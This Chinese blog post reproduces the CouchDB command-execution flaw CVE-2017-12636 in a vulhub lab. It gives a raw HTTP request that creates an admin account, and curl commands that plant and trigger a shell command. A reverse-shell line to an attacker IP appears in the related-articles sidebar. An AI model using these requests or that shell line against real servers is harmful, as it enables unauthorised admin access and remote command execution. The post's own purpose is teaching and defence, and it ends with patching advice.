Couchdb 任意命令执行漏洞(CVE-2017-12636)复现

最新推荐文章于 2024-06-20 15:50:26 发布
最新推荐文章于 2024-06-20 15:50:26 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 渗透测试 渗透实验 安全漏洞 文章标签: 安全 安全漏洞 渗透测试 web安全 Apache CouchDB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/125391526
版权

Couchdb 任意命令执行漏洞(CVE-2017-12636)复现

1、漏洞描述

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响范围

小于 1.7.0 以及 小于 2.1.1

2、环境搭建

这里使用vulhub搭建的漏洞环境,vulhub靶机ip:192.168.199.52  攻击机ip:192.168.199.51

搭建过程:

cd vulhub-master/couchdb/CVE-2017-12636
docker-compose up -d

启动环境后,访问:http://ip:5984

3、漏洞复现

1.添加管理员账号

该漏洞的利用是需要登录用户账号才可以触发,如果不清楚目标管理员密码,可以利用漏洞CVE-2017-12635 先增加一个管理员用户。

增加管理员用户的数据包如下:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.199.52:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 112


{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

依次执行以下请求可粗发任意命令执行:

curl -X PUT 'http://vulhub:vulhub@192.168.199.52:5984/_config/query_servers/cmd' -d '"id >/tmp/TestCouchdb"'

curl -X PUT 'http://vulhub:vulhub@192.168.199.52:5984/vultest'

curl -X PUT 'http://vulhub:vulhub@192.168.199.52:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'

curl -X POST 'http://vulhub:vulhub@192.168.199.52:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

第一个请求是添加一个名字为cmd的query_servers,其值为" id >/tmp/TestCouchdb ",这就是我们要执行的命令。

第二、三个请求是添加一个数据库和文档,这里添加了一个可以查询的。

 

第四个请求在这个数据库里进行,因为我将其设置为cmd,这里就是我最初cmd的开始添加的命名的query_servers最后触发命令执行。

查看靶机的docker中是否创建了TestCouchdb

docker ps
docker exec -it 06fabb650cbf /bin/bash
cat /tmp/TestCouchdb

4、修复建议

1.公网Apache CouchDB实例

建议升级到最新版本。

使用ECS安全组或防火墙策略,限制CouchDB端口暴露在互联网,设置精细化网络访问控制。

开启认证功能,不要使用默认账号口令,配置自定义账号和强口令,防止暴力破解攻击事件。

2.内网Apache CouchDB实例

使用ECS安全组或防火墙策略,限制CouchDB端口暴露在互联网,设置精细化网络访问控制。

开启认证功能,不要使用默认账号口令,配置自定义账号和强口令,防止暴力破解攻击事件。

参考链接:

13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)_全栈哈士奇的博客-CSDN博客

声明:

本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,

作者创作不容易,请大家点赞收藏支持一下。谢谢各位读者大老爷。

HEAVM
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CouchDB未授权访问漏洞记录(端口:5984、6984,CVE-2017-12635,CVE-2017-12636复现失败
墨痕诉清风的博客
11-23 1215
Apache CouchDB是一个开源数据库,专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部⻔的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。...
Couchdb_任意命令执行漏洞 CVE-2017-12636 漏洞复现
ADummy的博客
02-22 331
Couchdb 垂直权限绕过漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CouchDB会默认会在5984端口开放Restful的API接口,用于数据库的管理功能。 那么,问题出在哪呢?翻阅官方描述会发现,CouchDB中有一个Query_Server的配置
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636
最新发布
m0_60721823的博客
06-20 765
小于 1.7.0 以及小于 2.1.1。
Couchdb 任意命令执行漏洞CVE-2017-12636
时光凉春衫薄的博客
12-07 1932
产品样子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 首先通过(CVE-2017-12635)漏洞创建一个用户qwe 密码也是qwe 1.6.0 下的说明 依次执行如下请求即可触发任意命令执行: 查看命令执行的结果 按照 vulhub中提示的环境来看这些命令也可以通过curl命令进行 其中,`vulhub:vulhub`为管理员账号密码。 curl -X PUT 'ht...
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 217
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 320
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 380
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
CVE-2017-12635+12636 复现+反弹shell
weixin_45695535的博客
05-08 1450
整体过程漏洞描述一、复现过程环境复现cve-2017-12636反弹shellpython3 exp 反弹shell参考文章 漏洞描述 Apache CouchDB 是一个开源数据库,专注于易用性和成为” 完全拥抱 web 的数据库”。它是一个使用 JSON 作为存储格式,JavaScript 作为查询语言,MapReduce 和 HTTP 作为 API 的 NoSQL 数据库。应用广泛,如 BBC 用在其动态内容展示平台,Credit Suisse 用在其内部的商品部门的市场框架,Meebo,用在其社交
Couchdb 垂直权限绕过漏洞CVE-2017-12635)
一枚不知名的Java程序猿
10-02 966
vulhub漏洞复现学习过程
Apache couchdb 命令执行CVE-2017-12636复现
YouthBelief的博客
11-04 799
couchdb 命令执行CVE-2017-12636couchdb 命令执行CVE-2017-12636)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具复现0x04 漏洞修复 couchdb 命令执行CVE-2017-12636Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展
【vulhub】Couchdb 任意命令执行漏洞CVE-2017-12636
qq_45300786的博客
09-14 670
特征 特征请参考我的上一篇帖子 【vulhub】Couchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现 影响版本:小于 1.7.0 以及 小于 2.1.1 复现 注:复现中的很多东西也要用到这篇帖子,所以先看这篇 【vulhub】Couchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现 再来看本篇帖子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 本次复现是用的版本1.6 http://192.168.1
CouchDB 未授权访问漏洞总结
qq_45746681的博客
10-05 1173
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、CouchDB 未授权访问漏洞是什么?二、复现1.搭建环境2.漏洞反弹shell的exp防御方法 前言 复现常见的未授权访问漏洞 加强理解 一、CouchDB 未授权访问漏洞是什么? Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其
利用CouchDB未授权访问漏洞执行任意系统命令
3569
12-01 2931
0x00 前言 5月16日阿里云盾攻防对抗团队从外部渠道获知CouchDB数据库存在未授权访问漏洞(在配置不正确的情况下)。经过测试,云盾团队率先发现利用该未授权访问漏洞不仅会造成数据的丢失和泄露,甚至可执行任意系统命令。云盾安全专家团队第一时间完成了漏洞上报、安全评级,并通知了所有可能受影响的用户。下面将对该漏洞的出处和技术细节做详细解释。 http://static.hx99.net/
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2024-12636
04-16 829
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_46239998的博客
01-01 779
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
6f940c91ee6c hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:5984->5984/tcp couchdb0 b38fcba5811f hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:8984->5984/tcp couchdb3 f35978830422 hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:6984->5984/tcp couchdb1
05-24
这是一个运行了三个 CouchDB 容器的 Docker 服务。这些容器的镜像来自于 Hyperledger Fabric 项目,用于支持区块链网络的数据存储和查询。每个容器都暴露了不同的端口,其中 5984 是 CouchDB 的默认端口,8984 和 6984 是自定义的端口。容器分别命名为 couchdb0、couchdb1 和 couchdb3。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值